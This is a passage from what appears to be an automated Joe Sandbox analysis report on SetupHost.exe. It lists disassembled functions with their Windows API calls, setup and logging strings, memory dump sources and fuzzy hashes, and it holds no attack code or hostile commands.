                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentFormatMessageThread
                                                                                                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                        • API String ID: 2411632146-3173542853
                                                                                                                        • Opcode ID: 1499f884504bc4cd40094b09176ba91246468139898d809ca55cd3c7a584f6f1
                                                                                                                        • Instruction ID: c4fd6b0b1be37d9b5fca367a6433ea948c4e826dd4020e3c9881bab621ec4db6
                                                                                                                        • Opcode Fuzzy Hash: 1499f884504bc4cd40094b09176ba91246468139898d809ca55cd3c7a584f6f1
                                                                                                                        • Instruction Fuzzy Hash: 8F51F1B1900304ABEF309F259C1DEE7BEB8FB98308F10495BB10692253E776E940CB50
                                                                                                                        Function 0054E2A0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 132libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0054E312
                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll), ref: 0054E357
                                                                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-eventing-provider-l1-1-0.dll), ref: 0054E370
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EventWrite), ref: 0054E382
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EventRegister), ref: 0054E397
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EventUnregister), ref: 0054E3AC
                                                                                                                        • EventRegister.ADVAPI32 ref: 0054E409
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule$EventRegisterVersion
                                                                                                                        • String ID: EventRegister$EventUnregister$EventWrite$advapi32.dll$api-ms-win-eventing-provider-l1-1-0.dll
                                                                                                                        • API String ID: 3544251202-1971782300
                                                                                                                        • Opcode ID: 829fd7ee4bf60e4cb0a5274f553b7aadc8e5623d8e21afc9c6eb7da36fe5939c
                                                                                                                        • Instruction ID: 88edd3528cb87b243aa2a8b47ac101577ceb85884f3cc903b4f686ffe95881ce
                                                                                                                        • Opcode Fuzzy Hash: 829fd7ee4bf60e4cb0a5274f553b7aadc8e5623d8e21afc9c6eb7da36fe5939c
                                                                                                                        • Instruction Fuzzy Hash: D541C474A003189BDB228F14AC5ABDEBFB4BF59719F14449AE809A3250D7709E45DFA0
                                                                                                                        Function 005002B0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 005002CA
                                                                                                                        • GetLastError.KERNEL32 ref: 005002F8
                                                                                                                        • SetLastError.KERNEL32(000004C7), ref: 0050030B
                                                                                                                        • GetLastError.KERNEL32 ref: 005004C2
                                                                                                                        Strings
                                                                                                                        • DeletePathDirectoryCallback: Spoofing detected deleting [%s] -> [%s], xrefs: 0050043B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: DeletePathDirectoryCallback: Spoofing detected deleting [%s] -> [%s]
                                                                                                                        • API String ID: 1452528299-3938585608
                                                                                                                        • Opcode ID: bf5121761db16e7303eebd720182b40ead121fcdefb3fd791632589b516155c0
                                                                                                                        • Instruction ID: f875005f0df37f304d6e802721344aadd02cd4dc33564233346de27ac9424234
                                                                                                                        • Opcode Fuzzy Hash: bf5121761db16e7303eebd720182b40ead121fcdefb3fd791632589b516155c0
                                                                                                                        • Instruction Fuzzy Hash: C6618A71A0030AEFDB10DFA5D988BAEBBB5BF48311F109929E909972D0D770EE00DB54
                                                                                                                        Function 004FE1E2 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 81memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,00000000,?,005002A6,00000000,00500624,005004E0,?), ref: 004FE2C2
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE660
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE676
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6DB
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,?,005002A6,00000000,00500624,005004E0,?), ref: 004FE219
                                                                                                                        • GetLastError.KERNEL32(?,005002A6,00000000,00500624,005004E0,?), ref: 004FE223
                                                                                                                        • GetLastError.KERNEL32(?,005002A6,00000000,00500624,005004E0,?), ref: 004FE257
                                                                                                                        • GetLastError.KERNEL32(?,005002A6,00000000,00500624,005004E0,?), ref: 004FE25F
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,005002A6,00000000,00500624,005004E0,?), ref: 004FE27D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00500624,005004E0,?), ref: 004FE2A8
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004FE2AF
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00500624,005004E0,?), ref: 004FE2B6
                                                                                                                        Strings
                                                                                                                        • WdsRemoveDirectory: Unable to prepare path [%s]; GLE = 0x%x, xrefs: 004FE287
                                                                                                                        • WdsRemoveDirectory: Unable to clear attributes on [%s]; GLE = 0x%x, xrefs: 004FE22D
                                                                                                                        • WdsRemoveDirectory: Unable to remove directory [%s]; GLE = 0x%x, xrefs: 004FE267
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                        • String ID: WdsRemoveDirectory: Unable to clear attributes on [%s]; GLE = 0x%x$WdsRemoveDirectory: Unable to prepare path [%s]; GLE = 0x%x$WdsRemoveDirectory: Unable to remove directory [%s]; GLE = 0x%x
                                                                                                                        • API String ID: 686246089-2509674698
                                                                                                                        • Opcode ID: f69e0d07b0eb66dfcb6c35910579cd95b5f60723d7cad32771faf0a5d83f3f42
                                                                                                                        • Instruction ID: 283ef76bf34fc3634de49139c0e2acf22c44e5ead37475ae2593f80f5f91f115
                                                                                                                        • Opcode Fuzzy Hash: f69e0d07b0eb66dfcb6c35910579cd95b5f60723d7cad32771faf0a5d83f3f42
                                                                                                                        • Instruction Fuzzy Hash: CF1108317443087BD72027F76C5EF3B3A5DDB98B27F150466FA01923A1EA688804A569
                                                                                                                        Function 0053D024 Relevance: 18.2, APIs: 11, Strings: 1, Instructions: 162memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,?,00000000), ref: 0053D073
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,?,00000000), ref: 0053D098
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0053D09F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000200,00000000,00000001,?,00000000), ref: 0053D0AA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0053D0B1
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000001,?,00000000,00000200,00000200), ref: 0053D104
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000200,00000200), ref: 0053D190
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000200,00000200), ref: 0053D197
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0053D1D4
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0053D1DB
                                                                                                                        • CloseHandle.KERNEL32(00000001,00000001,?,00000000), ref: 0053D1E7
                                                                                                                          • Part of subcall function 0053D470: GetProcessHeap.KERNEL32(00000000,00000208,00000001,?,00000000,00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D489
                                                                                                                          • Part of subcall function 0053D470: HeapAlloc.KERNEL32(00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D490
                                                                                                                          • Part of subcall function 0053D470: GetVolumePathNameW.KERNEL32(00000000,00000000,00000104,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D4A9
                                                                                                                          • Part of subcall function 0053D470: GetProcessHeap.KERNEL32(00000000,00000208,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D4B9
                                                                                                                          • Part of subcall function 0053D470: HeapAlloc.KERNEL32(00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D4C0
                                                                                                                          • Part of subcall function 0053D470: GetVolumeNameForVolumeMountPointW.KERNEL32(00000000,00000000,00000104,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D4D3
                                                                                                                          • Part of subcall function 0053D470: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D513
                                                                                                                          • Part of subcall function 0053D470: GetProcessHeap.KERNEL32(00000000,00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D51F
                                                                                                                          • Part of subcall function 0053D470: HeapFree.KERNEL32(00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D526
                                                                                                                          • Part of subcall function 0053D470: GetProcessHeap.KERNEL32(00000000,00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D532
                                                                                                                          • Part of subcall function 0053D470: HeapFree.KERNEL32(00000000,?,0053D06C,00000000,00000001,?,00000000), ref: 0053D539
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$AllocVolume$CloseHandleName$CreateErrorFileLastMountPathPoint
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1244954680-4108050209
                                                                                                                        • Opcode ID: ad863efe222eab963af94e4181f458be78d236a86583094e24e701503cd3e0d1
                                                                                                                        • Instruction ID: 483336878995dfdfed87ea09e97d6c4828ea737db940d485e1b4e672e90a6054
                                                                                                                        • Opcode Fuzzy Hash: ad863efe222eab963af94e4181f458be78d236a86583094e24e701503cd3e0d1
                                                                                                                        • Instruction Fuzzy Hash: B7519D71E003199BDB10DFA8E8887AEBFB9BF48315F144629E815EB290D7749D45CBA0
                                                                                                                        Function 004ED3C0 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 004ED436
                                                                                                                        • GetVolumeNameForVolumeMountPointW.KERNEL32(003A003F,?,00000032), ref: 004ED448
                                                                                                                        • GetLastError.KERNEL32 ref: 004ED452
                                                                                                                        Strings
                                                                                                                        • SetupHost: Reporting external storage location for download to WU [%s], xrefs: 004ED49B
                                                                                                                        • CSetupHost::ReportStorageLocation, xrefs: 004ED405, 004ED46D
                                                                                                                        • SYSTEM\Setup\MoSetup\Volatile, xrefs: 004ED505
                                                                                                                        • StorageDriveLetter, xrefs: 004ED50B
                                                                                                                        • SetupHost: Putting external storage location for download in Reg [%c], xrefs: 004ED541
                                                                                                                        • ?, xrefs: 004ED3D7
                                                                                                                        • \, xrefs: 004ED3E0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Volume$ErrorLastMountNamePointmemset
                                                                                                                        • String ID: ?$CSetupHost::ReportStorageLocation$SYSTEM\Setup\MoSetup\Volatile$SetupHost: Putting external storage location for download in Reg [%c]$SetupHost: Reporting external storage location for download to WU [%s]$StorageDriveLetter$\
                                                                                                                        • API String ID: 3209952719-2916804376
                                                                                                                        • Opcode ID: b9098313ec33dbdc8e8d858ada87d4b06d596c6ba393361b98c2f8e3d3b9180d
                                                                                                                        • Instruction ID: 76e00dd217694a8a979ba242df0ee1ca86bf0402da2472242783c9e9ed544ff1
                                                                                                                        • Opcode Fuzzy Hash: b9098313ec33dbdc8e8d858ada87d4b06d596c6ba393361b98c2f8e3d3b9180d
                                                                                                                        • Instruction Fuzzy Hash: 1141D374B00218ABCB04ABA5CC99A3EB7A5FF58715F14805BE905DB381DF78AD01CB99
                                                                                                                        Function 004FD2F0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 51libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?), ref: 004FD31F
                                                                                                                        • GetProcAddress.KERNEL32(?,EtwEventRegister), ref: 004FD33E
                                                                                                                        • GetProcAddress.KERNEL32(?,EtwEventUnregister), ref: 004FD351
                                                                                                                        • GetProcAddress.KERNEL32(?,EtwEventEnabled), ref: 004FD364
                                                                                                                        • GetProcAddress.KERNEL32(?,EtwEventWrite), ref: 004FD377
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: EtwEventEnabled$EtwEventRegister$EtwEventUnregister$EtwEventWrite$ntdll.dll
                                                                                                                        • API String ID: 667068680-1838325978
                                                                                                                        • Opcode ID: f3c3e71c4caaefae9f96546241106a308bba9bf99d32410b361457f36e6dfeb7
                                                                                                                        • Instruction ID: c3f0d41af2c402686e8ca90304ecf64bb32db2d2f3f117f70369d566cc8f2048
                                                                                                                        • Opcode Fuzzy Hash: f3c3e71c4caaefae9f96546241106a308bba9bf99d32410b361457f36e6dfeb7
                                                                                                                        • Instruction Fuzzy Hash: 31112E70C013A8EBCB509F50BD5895D7BB6EF28B02760401FF90693278D3754A08EF95
                                                                                                                        Function 0053F1B3 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 147fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0053F223
                                                                                                                        • memset.MSVCRT ref: 0053F236
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 0053F323
                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,?,004C44E0,004C44A8,00000000,<unknown>,WdsLogStructuredException,?,00000000), ref: 0053F394
                                                                                                                          • Part of subcall function 0053EF6D: memset.MSVCRT ref: 0053EF95
                                                                                                                          • Part of subcall function 0053EF6D: GetTempFileNameW.KERNEL32(C:\$Windows.~WS\Sources\Panther\,mnd,00000000,?), ref: 0053EFB5
                                                                                                                          • Part of subcall function 0053F038: GetCurrentThreadId.KERNEL32 ref: 0053F09D
                                                                                                                          • Part of subcall function 0053F038: GetCurrentProcessId.KERNEL32(00000000,00000000,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?), ref: 0053F0BA
                                                                                                                          • Part of subcall function 0053F038: GetCurrentProcess.KERNEL32(00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?,?,?), ref: 0053F0C1
                                                                                                                          • Part of subcall function 0053F038: GetFileSize.KERNEL32(00000000,?,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?,?,?), ref: 0053F0E1
                                                                                                                          • Part of subcall function 0053F038: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C), ref: 0053F0F8
                                                                                                                          • Part of subcall function 0053F038: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?), ref: 0053F10B
                                                                                                                        Strings
                                                                                                                        • Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p). Minidump attached (%d bytes) to diagerr.xml and %s., xrefs: 0053F2FB
                                                                                                                        • <unknown>, xrefs: 0053F1EE, 0053F33C
                                                                                                                        • (T, xrefs: 0053F2C6
                                                                                                                        • WdsLogStructuredException, xrefs: 0053F337
                                                                                                                        • Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p)., xrefs: 0053F309
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Currentmemset$ProcessView$CreateErrorLastMappingNameSizeTempThreadUnmap
                                                                                                                        • String ID: <unknown>$Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p).$Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p). Minidump attached (%d bytes) to diagerr.xml and %s.$WdsLogStructuredException$(T
                                                                                                                        • API String ID: 843016236-548871019
                                                                                                                        • Opcode ID: 04d69c34f47d7777038d2bda328ec7cbd22e84387387ab21052a8103cbb61796
                                                                                                                        • Instruction ID: c3f2e41fe4bba94d53d07e38e92cf76d8bb34e3f8c978759274d6936a90f3e19
                                                                                                                        • Opcode Fuzzy Hash: 04d69c34f47d7777038d2bda328ec7cbd22e84387387ab21052a8103cbb61796
                                                                                                                        • Instruction Fuzzy Hash: 6B5163B5E002199FCB60DB24CC55BDE7BB9BB48310F5041EAB609A7291DB709E85CF68
                                                                                                                        Function 005212A5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 00521327
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 0052133D
                                                                                                                        • GetOverlappedResult.KERNEL32(?,00000001,00000001,00000001,?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 00521371
                                                                                                                          • Part of subcall function 005211C8: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00000001), ref: 005211F3
                                                                                                                          • Part of subcall function 005211C8: NtQueryInformationFile.NTDLL ref: 00521240
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 005213A3
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00521042,?,?,00000001), ref: 005213B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileInformation$HandleOverlappedQueryResult
                                                                                                                        • String ID: PgU$PgU$ReadWriteDataInternal
                                                                                                                        • API String ID: 3117618773-3679376002
                                                                                                                        • Opcode ID: d014708560034d990b906fcb6e41d2e4c3c643439f342ec2dcb830c5ecb2019e
                                                                                                                        • Instruction ID: 973b43ebc30834d64883d9cc45f0c1d0be87209e112fbdaecdc5002bea89f646
                                                                                                                        • Opcode Fuzzy Hash: d014708560034d990b906fcb6e41d2e4c3c643439f342ec2dcb830c5ecb2019e
                                                                                                                        • Instruction Fuzzy Hash: EB31D636600A29EB9B00CBA6AC44ABF7BBABFB5351F114815F905D7680D730DD01D768
                                                                                                                        Function 004F40AF Relevance: 13.6, APIs: 9, Instructions: 115memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessPreferredUILanguages.KERNEL32(00000008,?,00000000,?,?), ref: 004F4105
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004F4146
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004F414D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 004F41CE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004F41D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFreeLanguagesPreferred
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 579015856-0
                                                                                                                        • Opcode ID: 3390e04dcd0862fd4ee5c3f186a6462139fa5a958426fb29d9c0600e52c879ca
                                                                                                                        • Instruction ID: b54bf3bc995c51059e3577b90ad520b1203aa0df5acb74e464b863a9b7ae9b61
                                                                                                                        • Opcode Fuzzy Hash: 3390e04dcd0862fd4ee5c3f186a6462139fa5a958426fb29d9c0600e52c879ca
                                                                                                                        • Instruction Fuzzy Hash: 5A31E03AA0021DABCB11DBE09958BBF76B9ABD4711F200016F705D7280DE38CA059BA8
                                                                                                                        Function 0051A280 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0051834D: memset.MSVCRT ref: 00518369
                                                                                                                          • Part of subcall function 0051B3AC: DbgPrintEx.NTDLL ref: 0051B3F2
                                                                                                                          • Part of subcall function 0051B3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 0051B400
                                                                                                                          • Part of subcall function 0051A546: memset.MSVCRT ref: 0051A55F
                                                                                                                        • memset.MSVCRT ref: 0051A376
                                                                                                                        Strings
                                                                                                                        • CRtlGrowingList<struct _XMLDOC_ATTRIBUTE,50,6>::Initialize, xrefs: 0051A346
                                                                                                                        • onecore\base\xml\udom_xmlwalker.h, xrefs: 0051A2D2, 0051A33F
                                                                                                                        • RtlInitializeGrowingList( this, sizeof(TStoredObject), m_ulElementsPerChunk, (PVOID)m_InternalBuffer, sizeof(m_InternalBuffer), Allocator ), xrefs: 0051A354
                                                                                                                        • CXmlLogicalState::Initialize, xrefs: 0051A2D9
                                                                                                                        • RtlXmlInitializeNextLogicalThing(this, &Init), xrefs: 0051A2E7
                                                                                                                        • ,, xrefs: 0051A28D
                                                                                                                        • , xrefs: 0051A2B5
                                                                                                                        • -, xrefs: 0051A34D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
